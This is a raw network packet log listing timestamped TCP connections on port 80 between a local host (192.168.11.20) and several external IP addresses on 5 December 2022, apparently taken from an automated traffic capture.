                                                                                                                                                                          Dec 5, 2022 15:17:01.556195974 CET8049879194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:01.556291103 CET8049879194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:01.556406021 CET8049879194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:01.556462049 CET8049879194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:01.556504011 CET4987980192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:17:01.556787014 CET4987980192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:17:01.556863070 CET4987980192.168.11.20194.245.148.189
                                                                                                                                                                          Dec 5, 2022 15:17:01.574385881 CET8049879194.245.148.189192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:06.599523067 CET4988080192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:06.617696047 CET8049880185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:06.617929935 CET4988080192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:06.618046045 CET4988080192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:06.635365009 CET8049880185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:06.635468006 CET8049880185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:06.635524988 CET8049880185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:06.635776043 CET4988080192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:07.627183914 CET4988080192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:08.642541885 CET4988180192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:08.659177065 CET8049881185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:08.659429073 CET4988180192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:08.659539938 CET4988180192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:08.676166058 CET8049881185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:08.676209927 CET8049881185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:08.676242113 CET8049881185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:08.676425934 CET4988180192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:09.673379898 CET4988180192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:10.701361895 CET4988280192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:10.718314886 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.718570948 CET4988280192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:10.719192982 CET4988280192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:10.719279051 CET4988280192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:10.736044884 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.736100912 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.736150026 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.736249924 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.736351967 CET4988280192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:10.736454964 CET4988280192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:10.736517906 CET4988280192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:10.736531019 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.736704111 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.736862898 CET4988280192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:10.737035990 CET4988280192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:10.753309965 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.753557920 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.753613949 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.753657103 CET4988280192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:10.753758907 CET4988280192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:10.753804922 CET4988280192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:10.753875017 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.753983021 CET4988280192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:10.754053116 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.754097939 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.754328966 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.770694017 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.770932913 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.770991087 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.771282911 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.772298098 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.772388935 CET8049882185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:10.772598982 CET4988280192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:11.719806910 CET4988280192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:12.735423088 CET4988380192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:12.752213955 CET8049883185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:12.752449036 CET4988380192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:12.752525091 CET4988380192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:12.769191027 CET8049883185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:12.769244909 CET8049883185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:12.769288063 CET8049883185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:12.769565105 CET4988380192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:12.769720078 CET4988380192.168.11.20185.101.158.239
                                                                                                                                                                          Dec 5, 2022 15:17:12.786597013 CET8049883185.101.158.239192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:26.287492037 CET4988580192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:26.448400974 CET804988550.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:26.448847055 CET4988580192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:26.448947906 CET4988580192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:26.609807014 CET804988550.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:26.825609922 CET804988550.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:26.825725079 CET804988550.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:26.825814962 CET804988550.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:26.825880051 CET804988550.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:26.825943947 CET804988550.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:26.826006889 CET804988550.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:26.826041937 CET4988580192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:26.826103926 CET4988580192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:26.826105118 CET804988550.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:26.826204062 CET804988550.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:26.826240063 CET4988580192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:26.826313972 CET804988550.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:26.826380014 CET804988550.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:26.826435089 CET4988580192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:26.826440096 CET804988550.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:26.826585054 CET4988580192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:26.826699018 CET4988580192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:27.450764894 CET4988580192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:28.466191053 CET4988680192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:28.627652884 CET804988650.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:28.627906084 CET4988680192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:28.628016949 CET4988680192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:28.789369106 CET804988650.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:28.927171946 CET804988650.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:28.927288055 CET804988650.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:28.927347898 CET804988650.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:28.927396059 CET804988650.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:28.927443981 CET804988650.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:28.927503109 CET804988650.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:28.927506924 CET4988680192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:28.927552938 CET804988650.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:28.927604914 CET804988650.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:28.927653074 CET804988650.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:28.927695990 CET804988650.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:28.927740097 CET804988650.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:28.927809000 CET4988680192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:28.927989006 CET4988680192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:29.637779951 CET4988680192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:30.653285027 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:30.814996958 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:30.815452099 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:30.815977097 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:30.816092014 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:30.979212046 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:30.979358912 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:30.979420900 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:30.979477882 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:30.979497910 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:30.979552984 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:30.979599953 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:30.979607105 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:30.979660988 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:30.979660988 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:30.979715109 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:30.979886055 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:30.979993105 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:31.144973993 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.145561934 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:31.145695925 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:31.307110071 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.307173967 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.307233095 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.307271957 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.307425022 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.307529926 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.307816029 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.307878971 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.485908031 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.486077070 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.486191988 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.486289978 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.486387968 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.486437082 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:31.486485958 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.486574888 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.486603975 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:31.486673117 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.486771107 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.486773968 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:31.486860037 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.486943007 CET804988750.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:31.486944914 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:31.487119913 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:31.487281084 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:31.824645042 CET4988780192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:32.840392113 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.000922918 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.001228094 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.001368999 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.161837101 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.286813021 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.286931038 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.287020922 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.287103891 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.287168980 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.287230968 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.287242889 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.287338972 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.287398100 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.287420034 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.287499905 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.287578106 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.287580013 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.287739992 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.287904978 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.449146986 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.449266911 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.449337006 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.449429035 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.449500084 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.449563980 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.449587107 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.449673891 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.449753046 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.449753046 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.449759960 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.449856043 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.449934006 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.450002909 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.450066090 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.450092077 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.450167894 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.450239897 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.450264931 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.450265884 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.450341940 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.450412989 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.450433016 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.450509071 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.450576067 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.450602055 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.450675964 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.450746059 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.450772047 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.450942039 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.611155033 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.611443996 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.611537933 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.611597061 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.611654043 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.611660957 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.611743927 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.611803055 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.611823082 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.611877918 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:33.611996889 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.612215042 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.612333059 CET4988880192.168.11.2050.87.192.144
                                                                                                                                                                          Dec 5, 2022 15:17:33.772949934 CET804988850.87.192.144192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.634205103 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.679467916 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.679757118 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.679825068 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.725235939 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.727799892 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.727895975 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.727972031 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.728043079 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.728099108 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.728182077 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.728207111 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.728240013 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.728389025 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.728447914 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.728507042 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.728631973 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.728702068 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.728730917 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.728878975 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.774024963 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.774125099 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.774187088 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.774252892 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.774315119 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.774324894 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.774370909 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.774442911 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.774498940 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.774554014 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.774570942 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.774621964 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.774622917 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.774678946 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.774719000 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.774739981 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.774812937 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.774868011 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.774893999 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.774930954 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.774945021 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.774993896 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.775049925 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.775118113 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.775181055 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.775202036 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.775239944 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.775314093 CET8049889195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.775388956 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:38.775482893 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:39.682642937 CET4988980192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:40.698009014 CET4989080192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:40.743284941 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.743511915 CET4989080192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:40.743613958 CET4989080192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:40.788752079 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.790687084 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.790781021 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.790858984 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.790930033 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.790987968 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.791043043 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.791065931 CET4989080192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:40.791138887 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.791203022 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.791233063 CET4989080192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:40.791233063 CET4989080192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:40.791290045 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.791357040 CET8049890195.24.68.23192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:40.791400909 CET4989080192.168.11.20195.24.68.23
                                                                                                                                                                          Dec 5, 2022 15:17:40.791572094 CET4989080192.168.11.20195.24.68.23
